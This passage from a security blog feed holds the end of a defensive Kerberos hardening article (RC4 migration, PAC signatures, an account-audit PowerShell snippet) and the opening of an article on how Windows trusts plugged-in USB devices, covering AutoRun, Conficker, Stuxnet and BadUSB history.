&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Set &lt;code&gt;LDAPServerIntegrity = 2&lt;/code&gt; (require signing) and &lt;code&gt;LdapEnforceChannelBinding = 2&lt;/code&gt; (require channel binding on TLS-bound connections) via Group Policy. This is the dispositive KrbRelayUp defence [@krbrelayup] and the dispositive defence against any Kerberos-relay-class attack that targets the LDAP control plane. Pair with Extended Protection for Authentication on every AD CS Web Enrolment endpoint to close the AD CS HTTP-enrollment relay (ESC8) variant [@ms-kb-5014754].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Flight the &lt;code&gt;RC4DefaultDisablementPhase&lt;/code&gt; Group Policy setting in your Insider channel; pilot non-production AES-only configurations on a representative subset of service accounts; identify legacy NAS appliances, Linux MIT krb5 clients with keytabs older than 2017, and SQL Server linked-server SPNs before Phase 2 closes the audit window [@ms-beyond-rc4]. Phase 3 ships with CVE-2026-20833; production environments that have not run the audit will discover the dependency list the day enforcement lands.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;By mid-2026, every default in this list will have changed. Do the work in the audit window or do it in the post-flip ticket queue. The cost of an audit-window migration is a quarter of engineering time; the cost of a post-flip remediation is a sixty-minute outage on every undocumented RC4 dependency the directory holds. Cross-link to the &lt;a href=&quot;https://paragmali.com/blog/pluton-a-tpm-on-silicon-microsoft-can-patch/&quot; rel=&quot;noopener&quot;&gt;Pluton&lt;/a&gt;, TPM, and Credential Guard sibling articles for the hardware-backing layer that protects the long-term keys these controls assume.&lt;/p&gt;
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

AES-SHA1 (RFC 3962 enctypes 17 and 18) is enough against the 2026 attack picture: there is no known cryptographic attack against AES-256-CTS-HMAC-SHA1-96 within Kerberos&apos;s threat model, and AES eliminates the salt-less / iteration-less Kerberoasting weakness of RC4-HMAC [@rfc3962] [@ms-kerberoasting-guidance]. AES-SHA2 (RFC 8009 enctypes 19 and 20) is the obvious next step and is supported by [MS-KILE] bits K and L [@ms-kile-227]. Quantum threats are not the immediate worry for symmetric Kerberos; the exposed surface is PKINIT, not the ticket cipher.The Grover speedup applied to AES-256 leaves an effective 128-bit security margin, which is durable for the lifetime of any current cryptographic system [@nist-pqc].

Yes, for delegation, and that is the point. Per [@ms-protected-users], members cannot use unconstrained or constrained delegation, cannot use DES or RC4 in Kerberos pre-auth, and have their TGT capped at four hours. Workflows that today rely on a domain admin&apos;s TGT being forwardable to a downstream service must be reworked. Use Authentication Policy Silos for the per-account scope where some delegation must remain.

Yes, with risk. The mid-2026 enforcement boundary CVE-2026-20833 [@ms-beyond-rc4] is the formal cutover. Disabling RC4 today by setting `msDS-SupportedEncryptionTypes` to `0x18` (AES-only) on accounts will work, but expect breakage from Linux clients with MIT krb5 keytabs older than 2017, network-attached-storage appliances with hard-coded RC4 entries, and SQL Server linked-server SPNs that have not been updated. The audit-then-migrate cadence in Section 10 is the operationally honest path.

No. It kills *unsigned-PAC* Golden Tickets and most Diamond and Sapphire variants that tampered with PAC fields outside the original sub-signatures [@cve-2022-37967]. If an attacker has the actual `krbtgt` long-term key, they still mint correctly-signed tickets -- the Full PAC Signature is computed with that same key. The defence is rapid `krbtgt` rotation (the dual-password scheme means you must rotate twice with an interval) plus Credential Guard to keep the key out of LSASS user-mode memory.

PKINIT [@rfc4556] exists, Active Directory Certificate Services exists, Windows Hello for Business is built on top of PKINIT. The reason &quot;everywhere&quot; was hard is Certifried (CVE-2022-26923) [@cve-2022-26923] and the strong-mapping retrofit [@ms-kb-5014754]: the original ADCS templates allowed a certificate&apos;s Subject Alternative Name to be set independently of the AD account that requested the certificate, which let an attacker mint a certificate claiming to be a domain controller. Strong mapping (the SID-binding X.509 extension) closed that, but the rollout took years to land in Enforcement mode (see §4 for the full date sequence).

It eliminates the *wire* form. There is no NT hash on the LSA-to-Local-KDC path; the long-term key is an AES-256 derivation. A SYSTEM-level attacker on the box still recovers that AES key, because LSA must hold it in user-mode memory to hand to the Kerberos SSP. The chip-side defences (TPM, Microsoft Pluton, Credential Guard) remain orthogonal and necessary per [@fosdem-localkdc]. Local KDC closes the relay-from-the-wire class, not the SYSTEM-on-the-box class.

Kerberos Cloud Trust for Windows Hello for Business issues TGTs from Entra ID and federates trust back to on-premises AD, so an Entra-joined laptop can present a domain-trusted Kerberos ticket to a file server it has never directly authenticated to. The on-premises KDC role is partially federated; the on-prem AD signs nothing for the Entra-issued TGT but trusts Entra&apos;s signature via Cloud Trust. Per [@ms-palko-evolution] the architecture is shipping in stages. The full story is its own article in this series.

Not in this decade. The architectural trajectory is &quot;Kerberos + PKINIT + FAST + Local KDC + IAKerb + Authentication Policy Silos + TPM-backed long-term keys&quot; -- not a replacement protocol. The closest thing to a replacement on the horizon is post-quantum PKINIT, which is more of a re-cipher than a re-protocol. The Kerberos message triple (AS-REQ, TGS-REQ, AP-REQ) is genuinely durable.Compared with the 28-year deprecation cycle NTLM took, replacing Kerberos would be a thirty-year project on the same precedent. Microsoft&apos;s stated direction is to harden the joints, not to throw out the skeleton.

The commands below assume Server 2019 or later with the `microsoft/Kerberos-Crypto` repo cloned locally. Run on a domain controller; output names every account whose configured `msDS-SupportedEncryptionTypes` allows RC4 or has no explicit setting (in which case it inherits the pre-Phase-2 default of &quot;anything goes&quot;). Cross-reference with the 4768 / 4769 audit stream from `Get-KerbEncryptionUsage.ps1` to identify which of those accounts is actually being issued RC4 tickets in practice.&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;# Enumerate accounts and configured enctypes
Import-Module ActiveDirectory
.\List-AccountKeys.ps1 -OutputCsv accounts.csv

# Parse 4768 / 4769 events for issued ticket enctypes
.\Get-KerbEncryptionUsage.ps1 -LookbackDays 30 -OutputCsv tickets.csv

# Join the two on account name -- the accounts that
# both have RC4-allowed AND were issued RC4 tickets
# are your Phase 3 incident list.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;kerberos-in-windows-the-other-half-of-ntlmless&quot; keyTerms={[
  { term: &quot;Kerberos Domain&quot;, definition: &quot;A Kerberos administrative boundary scoping principals and a single Key Distribution Center; written in uppercase like CONTOSO.COM.&quot; },
  { term: &quot;Ticket-Granting Ticket (TGT)&quot;, definition: &quot;A Kerberos ticket issued by the AS that the client uses to obtain service tickets from the TGS without re-presenting its password.&quot; },
  { term: &quot;Privilege Attribute Certificate (PAC)&quot;, definition: &quot;Microsoft-specific authorization data attached by the KDC to every Windows Kerberos ticket; carries the user&apos;s SID and group SIDs and is covered by three signatures after CVE-2022-37967.&quot; },
  { term: &quot;String-to-Key (s2k)&quot;, definition: &quot;The function converting a password into a Kerberos long-term symmetric key. RC4: MD4(UTF-16-LE(password)). AES: PBKDF2-HMAC-SHA1 at 4,096 iterations.&quot; },
  { term: &quot;Pre-authentication Data (PA-DATA)&quot;, definition: &quot;The extensibility hook in AS-REQ/AS-REP that every Kerberos enhancement since 1993 has used to layer new behaviour on the original protocol.&quot; },
  { term: &quot;Service Principal Name (SPN)&quot;, definition: &quot;A unique identifier for a service instance in AD; any account with an SPN is a Kerberoasting candidate.&quot; },
  { term: &quot;Authentication Policy Silo&quot;, definition: &quot;A scope construct in AD that applies Protected-Users-equivalent constraints to tiered subsets of accounts; enables mandatory FAST armoring per silo.&quot; },
  { term: &quot;IAKerb&quot;, definition: &quot;Initial and Pass Through Authentication Using Kerberos V5 and the GSS-API; encapsulates AS/TGS exchanges inside GSS-API tokens so a client without KDC line-of-sight can authenticate via the application server.&quot; },
  { term: &quot;Local KDC&quot;, definition: &quot;An in-process Kerberos KDC on the local Windows host backed by the SAM database; closes the workgroup and Azure-joined no-KDC-line-of-sight gap that kept NTLM alive.&quot; },
  { term: &quot;Resource-Based Constrained Delegation (RBCD)&quot;, definition: &quot;A delegation model where the target service writes msDS-AllowedToActOnBehalfOfOtherIdentity to authorise who may use S4U2Proxy against it; the structural foundation of the post-NTLM RBCD chain in this article&apos;s Hook.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>kerberos</category><category>active-directory</category><category>windows-security</category><category>authentication</category><category>iakerb</category><category>rc4</category><category>rbcd</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Plug and Trust: How Windows Decides What to Do When You Plug In a USB Device</title><link>https://paragmali.com/blog/plug-and-trust-how-windows-decides-what-to-do-when-you-plug-/</link><guid isPermaLink="true">https://paragmali.com/blog/plug-and-trust-how-windows-decides-what-to-do-when-you-plug-/</guid><description>In the 250 ms between physical insertion and class-driver attach, Windows executes ten or eleven kernel-mode operations (eleven for composite devices) and trusts ~256 bytes of self-described descriptors.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
Plugging a USB device into Windows is the single most-trusted action a user routinely performs on an operating system that verifies every byte of code it loads. In a few hundred milliseconds (typically 200-300 ms when the driver is already in the local store; longer on a first-time Windows Update fetch), Windows executes ten or eleven kernel-mode operations (eleven for composite devices) and trusts about 256 bytes of self-described descriptors to decide which driver runs. This article walks that pipeline end-to-end on Windows 11 25H2: the descriptor parser surface, the Plug-and-Play rank algorithm, Kernel-Mode Code Signing and Kernel DMA Protection, BadUSB and Thunderclap, and the five structural limits Windows cannot close without breaking USB compatibility.
&lt;h2&gt;1. The Thirty-Second Trust Decision&lt;/h2&gt;
&lt;p&gt;A user plugs a USB-C thumb drive into a Windows 11 25H2 corporate laptop at 10:42:17 in the morning. Roughly a quarter-second later, the operating system has executed ten or eleven kernel-mode operations (eleven for composite devices) to decide what kind of device it is and which driver to load.The &quot;quarter-second&quot; is editorial framing, not a spec-mandated deadline. The only piece USB-IF actually fixes is the 100 ms attach-debounce window T_ATTDB defined in the USB 2.0 specification §7.1.7.3 (Connect and Disconnect Signaling) [@usb-2-0-spec]; the rest of the budget is implementation-dependent. A typical USB 2.0 thumb drive on a 2024-era xHCI controller, with the function driver already in the local store, lands in the 200-300 ms range. A first-time Windows Update fetch, a slow descriptor read, or a multi-configuration device can stretch it to a second or more. None of those eleven operations consulted the user. None of them verified a cryptographic signature from the peripheral. The entire decision rests on roughly 256 bytes of self-described metadata that the device handed the host on insertion.&lt;/p&gt;
&lt;p&gt;Here is the sequence, in the order Windows executes it:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Port-status-change interrupt fires on the xHCI host controller.&lt;/li&gt;
&lt;li&gt;The host controller&apos;s driver issues a port reset.&lt;/li&gt;
&lt;li&gt;Downstream-port speed detection runs: Low, Full, High, Super, or Super+ Speed.&lt;/li&gt;
&lt;li&gt;The hub addresses the device at the default address (zero) and asks for the first eight bytes of the &lt;code&gt;USB_DEVICE_DESCRIPTOR&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SET_ADDRESS&lt;/code&gt; assigns a non-default bus address.&lt;/li&gt;
&lt;li&gt;The hub fetches the full eighteen-byte device descriptor.&lt;/li&gt;
&lt;li&gt;The hub fetches the configuration descriptor, including all interface and endpoint sub-descriptors.&lt;/li&gt;
&lt;li&gt;If the descriptor indicates a composite device, the generic parent splits it into per-interface child devices.&lt;/li&gt;
&lt;li&gt;The Plug-and-Play manager synthesizes hardware IDs and compatible IDs from the descriptor fields.&lt;/li&gt;
&lt;li&gt;The driver-store INF database is searched with a rank-scored matching algorithm; the chosen driver is verified against the Kernel-Mode Code Signing policy.&lt;/li&gt;
&lt;li&gt;The class driver attaches to the new device node and begins serving I/O.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Microsoft&apos;s own architecture documentation confirms the pipeline: the xHCI host controller driver, the host-controller extension, and the hub driver -- &lt;code&gt;usbhub3.sys&lt;/code&gt;, the binary that enumerates devices and creates physical device objects -- are all KMDF-based [@ms-usb-3-0-stack]. The rank-scored INF match comes straight from the Plug-and-Play manager&apos;s documented behavior [@ms-pnp-rank]. The signature check is governed by the same Kernel-Mode Code Signing policy that has gated every kernel driver since 64-bit Windows Vista shipped in 2007 [@ms-kmcs].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Ten or eleven kernel-mode operations (eleven for composite devices). Zero human decisions. Roughly 256 bytes of self-described metadata. That is the size of the trust gap between physical insertion and the moment a class driver begins reading and writing data inside the Windows kernel.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The load-bearing primitive in that pipeline is the &lt;em&gt;USB descriptor&lt;/em&gt;: a small block of bytes the peripheral emits when asked, naming what kind of device it claims to be, who claims to have made it, and what features it claims to support. Windows must trust those bytes to choose a driver. There is no out-of-band channel to verify them. There is no signature on the descriptor itself.&lt;/p&gt;
&lt;p&gt;This article is a walk through what Windows does verify, what it cannot verify, and where the gap lives. The trust posture is older than USB itself, and the failure modes are older than Windows 2000. We will start with the inheritance.&lt;/p&gt;
&lt;h2&gt;2. The Pre-USB Removable-Media Trust Model&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;A user in Lahore inserts a 5.25-inch floppy into an IBM PC clone. Whatever 512 bytes sit at sector zero of that diskette will execute as part of the operating-system boot path before any code that came with the machine runs. The trust model Windows still uses for USB peripherals in 2026 was carved into silicon that year.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The IBM PC&apos;s boot ROM, by design, copied sector zero of whatever bootable medium was present into memory and jumped to it. That contract -- &lt;em&gt;inserted media is trusted media&lt;/em&gt; -- shipped in 1981 and was demonstrated as catastrophic within five years. The Brain virus appeared in 1986 [@wiki-brain]; Stoned in 1987 [@wiki-stoned]; Michelangelo was first discovered on 3 February 1991 in Australia and produced its global panic on March 6, 1992 [@wiki-michelangelo]. Each one used the boot-sector primitive that Wikipedia&apos;s standard reference on boot sectors documents [@wiki-bootsector].The Brain virus shipped with a literal copyright notice in the boot sector, naming the Alvi brothers and giving an address in Lahore: a piece of self-documenting malware authored when virus authors did not yet expect to be prosecuted. The address-and-phone-number pattern is a recurring forensic curiosity from the 1986-1990 era.&lt;/p&gt;

A USB descriptor is a small, structured block of bytes that a USB peripheral returns when the host asks for it. There are five standard descriptor types in the USB 1.0 specification (device, configuration, string, interface, endpoint) and several class-specific descriptors (HID report descriptors, audio control units, mass-storage CSW formats) layered on top. The device descriptor names a vendor ID, a product ID, a device class, and the maximum packet size for the default control pipe. The string descriptors carry the human-readable manufacturer, product, and serial-number text that Windows displays in Device Manager and that Defender for Endpoint per-serial allow-lists key on. The host has no out-of-band channel to verify any of these fields; the peripheral&apos;s self-declaration *is* its identity for the purpose of driver selection.
&lt;p&gt;Microsoft inherited the contract from DOS and refined it. AutoRun, which the Wikipedia reference documents verbatim, &lt;em&gt;&quot;was introduced in Windows 95 to ease application installation for non-technical users and reduce the cost of software support calls ... a feature of Windows Explorer (actually of the shell32 dll) ... enables media and devices to launch programs by use of command listed in a file called &lt;code&gt;autorun.inf&lt;/code&gt;, stored in the root directory of the medium&quot;&lt;/em&gt; [@wiki-autorun]. Windows 95 RTMed on August 24, 1995. The original design intent was &lt;em&gt;CD-ROM application installation&lt;/em&gt; -- read-only optical media, written once at the factory, shipped in a sealed jewel case. The trust assumption matched the physical reality.&lt;/p&gt;
&lt;p&gt;Four months after Windows 95 shipped, the USB Implementers Forum was formed. Wikipedia preserves the date and the founder list verbatim: &lt;em&gt;&quot;The USB-IF was initiated on December 5, 1995, by the group of companies that was developing USB ... Compaq, Digital Equipment Corporation, IBM, Intel, Microsoft, NEC and Nortel&quot;&lt;/em&gt; [@wiki-usbif]. Microsoft was a co-author of the contract that would govern peripheral trust on every Windows machine for the next thirty years.&lt;/p&gt;

A Vendor ID is a 16-bit number that the USB Implementers Forum sells to a device manufacturer for a one-time \$6,000 fee [@wiki-usbif]. A Product ID is a 16-bit number the manufacturer assigns to a specific product within their VID space. The pair forms the most-specific hardware ID Windows uses to select a USB driver, in the form `USB\VID_xxxx&amp;amp;PID_xxxx`. The USB-IF Vendor-ID fee is the only economic gate between an arbitrary firmware author and a &quot;trusted&quot; identity in Windows&apos;s driver-store search; it is not a cryptographic gate of any kind.
&lt;p&gt;The first complete USB specification followed quickly. Wikipedia&apos;s USB article puts it verbatim: &lt;em&gt;&quot;Designed January 1996 ... Produced Since May 1996 ... Designer: Compaq, DEC, IBM, Intel, Microsoft, NEC, Nortel&quot;&lt;/em&gt; [@wiki-usb]. USB 1.0 defined the five standard descriptors, the bus enumeration handshake, and -- the load-bearing architectural choice -- the &lt;em&gt;device-class architecture&lt;/em&gt; in which the peripheral declares its own class, subclass, and protocol. A USB keyboard reports &lt;code&gt;bInterfaceClass=0x03&lt;/code&gt; (HID) because it says it is a keyboard. The host has no other source of that fact.&lt;/p&gt;
&lt;p&gt;Three years later, the protocol&apos;s storage cousin arrived. The USB Mass Storage Class Bulk-Only Transport, Revision 1.0, was published in September 1999 [@usb-massbulk-pdf]. That specification is the protocol on which Windows 2000&apos;s &lt;code&gt;usbstor.sys&lt;/code&gt; and every modern thumb-drive driver are built. It defines a stripped-down SCSI command set tunneled over USB bulk endpoints; it does not define any peripheral-authentication mechanism.&lt;/p&gt;
&lt;p&gt;The inheritance is structural. AutoRun shipped in 1995, designed for write-once optical media in a sealed jewel case. Windows 2000 extended AutoRun to every mounted volume -- including the new USB thumb-drive class. A 1995 trust model for trusted physical media now protected read-write USB sticks anyone could carry between machines. Forty years later, that line in the lineage has not been redrawn.&lt;/p&gt;

timeline
    title Pre-USB removable-media trust, 1981 to 2000
    1981 : IBM PC ships : Boot ROM jumps to sector 0 of inserted media
    1986 : Brain virus : Lahore : First in-the-wild boot-sector virus
    1987 : Stoned virus : Boot-sector class established
    1991 : Michelangelo discovered : 3 February 1991, Australia
    1992 : Michelangelo media panic : Trigger date 6 March 1992
    1995 : Windows 95 RTM : AutoRun introduced for CD-ROM installers
    1995 : USB-IF founded December 5 : Seven-company consortium
    1996 : USB 1.0 designed January : Device-class architecture: peripheral declares its own class
    1999 : USB Mass Storage 1.0 : Bulk-Only Transport specification
    2000 : Windows 2000 usbstor.sys : AutoRun extends to USB volumes
&lt;p&gt;Timeline sources, in row order: [@wiki-bootsector] for the IBM PC boot-sector contract; [@wiki-brain], [@wiki-stoned], and [@wiki-michelangelo] for the named-virus lineage and the 1992-not-1991 Michelangelo panic date; [@wiki-autorun] for the Windows 95 / AutoRun introduction; [@wiki-usbif] for the USB-IF founding date and seven-company consortium; [@wiki-usb] for the USB 1.0 January 1996 design date and the device-class architecture; [@usb-massbulk-pdf] for the USB Mass Storage Class Bulk-Only Transport 1.0 specification.&lt;/p&gt;
&lt;p&gt;If the trust model is forty years old, the failure modes must be older than USB. They are. The first fifteen years of USB on Windows were a transport in search of a security model, and the bill came due in two famous worms.&lt;/p&gt;
&lt;h2&gt;3. The Pre-Hardening Era, 1996 to 2010&lt;/h2&gt;
&lt;p&gt;For its first fifteen years on Windows, USB was a transport in search of a security model. Drivers were unsigned on 32-bit. AutoRun was on. Descriptors were trusted. The bill was paid in two worms.&lt;/p&gt;
&lt;p&gt;The Generation-1 stack was a USB 1.1 design retrofitted onto Windows 95 OSR2.1 in 1997 and refined for Windows 2000. The host-controller drivers (&lt;code&gt;Usbuhci.sys&lt;/code&gt;, &lt;code&gt;Usbohci.sys&lt;/code&gt;, and later &lt;code&gt;Usbehci.sys&lt;/code&gt; for USB 2.0 high speed) sat below a single port driver, &lt;code&gt;Usbport.sys&lt;/code&gt;; the hub driver was &lt;code&gt;usbhub.sys&lt;/code&gt;. Microsoft&apos;s USB-3.0 architecture page documents the older 2.0 stack as the predecessor of the modern KMDF chain [@ms-usb-3-0-stack]. On 32-bit Windows, none of these binaries needed a Microsoft-trusted signature to load.&lt;/p&gt;
&lt;p&gt;Windows 2000 added &lt;code&gt;usbstor.sys&lt;/code&gt;, the function driver implementing the USB Mass Storage Class Bulk-Only protocol [@usb-massbulk-pdf]. Suddenly a thumb drive was a first-class read-write filesystem the user could carry between machines, and AutoRun -- a 1995 contract for CD-ROM application installers -- applied to it.The original &lt;code&gt;autorun.inf&lt;/code&gt; was a sensible primitive. Insert a sealed jewel case, run the vendor&apos;s setup wizard, get a new application. Extending the contract to user-writable USB sticks broke the cardinal assumption: that the media&apos;s content was set by a trustworthy party at the factory and could not be modified in the field.&lt;/p&gt;

KMCS is the Windows policy that requires every kernel-mode binary -- every `.sys` file Windows loads into ring zero -- to carry a digital signature chaining to a Microsoft-trusted root certificate. KMCS has been mandatory on 64-bit Windows since Vista shipped in 2007. Microsoft Learn documents the signing-by-version matrix, the SHA-256 algorithm requirement, and the post-2016 narrowing of the cross-signed-CA exception. KMCS prevents an attacker from loading an arbitrary `.sys` file into the kernel. It does not, by itself, prevent an attacker from feeding malicious *data* to an already-signed `.sys` file.
&lt;p&gt;The Conficker worm, first detected in November 2008, industrialized the AutoRun-on-USB era. Wikipedia summarizes its origin verbatim: &lt;em&gt;&quot;first detected in November 2008 ... uses flaws in Windows OS software (MS08-067 / CVE-2008-4250) and dictionary attacks on administrator passwords to propagate ... The first variant of Conficker, discovered in early November 2008, propagated through the Internet by exploiting a vulnerability in a network service (MS08-067)&quot;&lt;/em&gt; [@wiki-conficker]. Conficker rode two completely separate vectors: a Server Service vulnerability (a path-canonicalization overflow in &lt;code&gt;srvsvc.dll&lt;/code&gt; reachable over SMB on TCP 445 and via NetBIOS over TCP/IP on TCP 139) over the network [@nvd-cve-2008-4250], and &lt;code&gt;autorun.inf&lt;/code&gt;-driven AutoPlay execution on inserted USB drives. The two propagation paths are independent and worth distinguishing.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; MS08-067 / CVE-2008-4250 is the Server Service RPC-over-SMB vulnerability (reachable on TCP 445 and via NetBIOS over TCP/IP on TCP 139) that gave Conficker its network propagation. NIST&apos;s NVD entry characterises the surface verbatim as &lt;em&gt;&quot;a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka &apos;Server Service Vulnerability&apos;&quot;&lt;/em&gt; [@nvd-cve-2008-4250]. The USB-side propagation came from &lt;code&gt;autorun.inf&lt;/code&gt; on inserted thumb drives, not from MS08-067. The two vectors share a worm but not a vulnerability. Press accounts that conflate them tend to overstate what closing MS08-067 actually did to USB-borne malware in 2008.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Stuxnet followed in 2010. Wikipedia&apos;s article puts the timing and the vector verbatim: &lt;em&gt;&quot;Stuxnet is a malicious computer worm first uncovered on 17 June 2010 ... It is typically introduced to the target environment via an infected USB flash drive, thus crossing any air gap&quot;&lt;/em&gt; [@wiki-stuxnet]. The technical primitive that let Stuxnet cross air gaps onto Iranian centrifuge-control PCs was CVE-2010-2568, a flaw in the Windows Shell&apos;s processing of &lt;code&gt;.LNK&lt;/code&gt; shortcut icons. NIST&apos;s National Vulnerability Database entry preserves the verbatim characterization: &lt;em&gt;&quot;Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems&quot;&lt;/em&gt; [@nvd-cve-2010-2568]. Microsoft Security Bulletin MS10-046 shipped the patch [@ms10-046].&lt;/p&gt;

Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010. -- NIST, National Vulnerability Database, CVE-2010-2568 [@nvd-cve-2010-2568]
&lt;p&gt;Patch Tuesday, February 2011 closed the AutoRun pipeline outside Windows 7. Brian Krebs covered the rollout verbatim at the time: &lt;em&gt;&quot;Microsoft also issued an update that changes the default behavior in Windows when users insert a removable storage device, such as a USB or thumb drive. This update effectively disables &apos;autorun,&apos; a feature of Windows that has been a major vector for malware over the years. Microsoft released this same update in February 2009, but it offered it as an optional patch. The only thing different about the update this time is that it is being offered automatically to users who patch through Windows Update or Automatic Update&quot;&lt;/em&gt; [@krebs-feb2011]. The update originally shipped as an optional Windows-7-era fix; Microsoft made it automatic for XP, Vista, Server 2003, and Server 2008 in February 2011.&lt;/p&gt;
&lt;p&gt;Six months later, the descriptor-parser surface itself was named for the first time. Andy Davis of NCC Group gave &lt;em&gt;&quot;USB -- Undermining Security Barriers&quot;&lt;/em&gt; at Black Hat USA 2011. The verified NCC Group publication archive carries the talk and a one-line abstract [@ncc-davis-2011]. Davis fuzzed USB descriptors against the Windows kernel parser and demonstrated that the parser itself -- not the application layer, not AutoRun -- was kernel-mode adversarial-input attack surface. The talk did not name a single bug class; it named the &lt;em&gt;class of bugs&lt;/em&gt;: anything that parses adversarial bytes in ring zero in a memory-unsafe language.&lt;/p&gt;
&lt;p&gt;Why did none of these fixes survive structurally? Each was a single-bug closure. Disabling AutoRun did nothing about HID injection. Patching the LNK parser did nothing about the descriptor-parser surface. Signing kernel binaries did not change what those binaries trusted at runtime. Each fix shrank one bug class by one. The premise -- that a USB peripheral&apos;s self-declaration &lt;em&gt;is&lt;/em&gt; its identity -- was untouched.&lt;/p&gt;
&lt;p&gt;The post-2010 hardening of USB on Windows would change the surfaces around the descriptor parser. None of it would change the descriptor parser&apos;s contract.&lt;/p&gt;
&lt;h2&gt;4. Generation by Generation: Ten Acts of Hardening&lt;/h2&gt;
&lt;p&gt;The post-2010 hardening of USB on Windows is a ten-act story: signing, lockdown, watershed, silicon, policy. Each act addressed one premise, and exactly one premise, of the trust failure that came before it. None of them changed the foundational contract.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 2 -- Vista x64 Kernel-Mode Code Signing (2007).&lt;/strong&gt; Every USB function and class driver had to chain to a Microsoft-trusted root and use SHA-2 once 64-bit Vista landed. Microsoft Learn carries the signing-by-version matrix and the cross-signed-CA carve-out verbatim, including the post-2015 narrowing in which &lt;em&gt;&quot;Cross-signed drivers are still permitted if ... The PC was upgraded from an earlier release of Windows to Windows 10, version 1607 ... Drivers was signed with an end-entity certificate issued prior to July 29th 2015 that chains to a supported cross-signed CA&quot;&lt;/em&gt; [@ms-kmcs]. Companion documentation describes the broader driver-signing pipeline [@ms-drvsigning]. For the full reinvention of code-identity verification on Windows, the sibling article on Windows app identity is the canonical reference [@paragmali-appid].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 3 -- AutoRun and LNK lockdown (2009-2011).&lt;/strong&gt; Already covered in Section 3. KB971029 and MS10-046, taken together, closed the &lt;code&gt;autorun.inf&lt;/code&gt;-driven AutoPlay vector and the LNK-icon parsing flaw used by Stuxnet [@krebs-feb2011] [@nvd-cve-2010-2568].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Generation 4 -- The descriptor-parser surface and the USB 3.0 stack (2011-2012).&lt;/strong&gt; Andy Davis named the surface at Black Hat 2011 [@ncc-davis-2011]. Windows 8 in 2012 shipped a new USB 3.0 stack written from scratch on Microsoft&apos;s Kernel-Mode Driver Framework. The architectural reference confirms the rebuild verbatim: &lt;em&gt;&quot;Microsoft created the USB 3.0 drivers by using Kernel Mode Driver Framework (KMDF) interfaces ... Usbhub3.sys ... Manages USB hubs and their ports ... Enumerates devices and other hubs ... Creates physical device objects (PDOs)&quot;&lt;/em&gt; [@ms-usb-3-0-stack]. The new stack changed the codebase the descriptor parser ran in. It did not change the contract the descriptor parser had to honor.&lt;/p&gt;

The Human Interface Device class is a USB device-class specification originally designed for keyboards, mice, joysticks, and similar input devices. A USB device declares itself HID by setting `bInterfaceClass=0x03` in its interface descriptor. Once Windows accepts that declaration, the device is allowed to inject keyboard and pointer events into the active session as if a human were operating a physical keyboard. The HID class has no provision for authenticating that the device is, in fact, a keyboard rather than a reprogrammed thumb drive emulating one; the class definition is itself the attack surface.
&lt;p&gt;&lt;strong&gt;Generation 5 -- BadUSB watershed (Black Hat USA 2014).&lt;/strong&gt; Karsten Nohl, Sascha Krißler, and Jakob Lell of SR Labs presented &lt;em&gt;BadUSB -- On Accessories That Turn Evil&lt;/em&gt; [@nohl-wiki]. The SR Labs slide deck&apos;s title page is preserved verbatim, with all three authors named, on a mirrored PDF [@srlabs-badusb-pdf]; Wikipedia&apos;s BadUSB article also preserves the three-author attribution and the underlying primitive: &lt;em&gt;&quot;USB flash drives can contain a programmable Intel 8051 microcontroller&quot;&lt;/em&gt; [@wiki-badusb].Wired&apos;s contemporaneous press coverage credited only Nohl and Lell; Krißler&apos;s name was dropped in the popular write-up. The SR Labs slide deck and the Wikipedia article both preserve the full three-author attribution. Press attributions of conference talks routinely shed authors; the slide-deck title page is the durable source. Two months after Black Hat, Adam Caudill and Brandon Wilson released the Psychson toolchain at DerbyCon 2014, demonstrating end-to-end reflash of the Phison PS2251-03 controller. The repository README confirms the lineage verbatim: &lt;em&gt;&quot;this is 8051 custom firmware written in C ... firmware patches have only been tested against PS2251-03 firmware version 1.03.53 ... DriveCom ... EmbedPayload ... Injector ... Huge thanks to the Hak5 team for their work on the excellent USB Rubber Ducky&quot;&lt;/em&gt; [@psychson-repo]. Wired&apos;s October 2014 follow-up carries Caudill&apos;s verbatim release rationale from the DerbyCon stage: &lt;em&gt;&quot;The belief we have is that all of this should be public. It shouldn&apos;t be held back. So we&apos;re releasing everything we&apos;ve got&quot;&lt;/em&gt; [@wired-2014-10]. The same article quotes Nohl&apos;s verbatim architectural verdict on the underlying protocol: &lt;em&gt;&quot;to prevent USB devices&apos; firmware from being rewritten, their security architecture would need to be fundamentally redesigned ... it could take 10 years or more to iron out the USB 